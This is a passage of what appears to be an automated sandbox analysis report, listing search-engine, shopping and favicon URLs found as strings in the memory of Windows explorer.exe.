Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2185297080.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
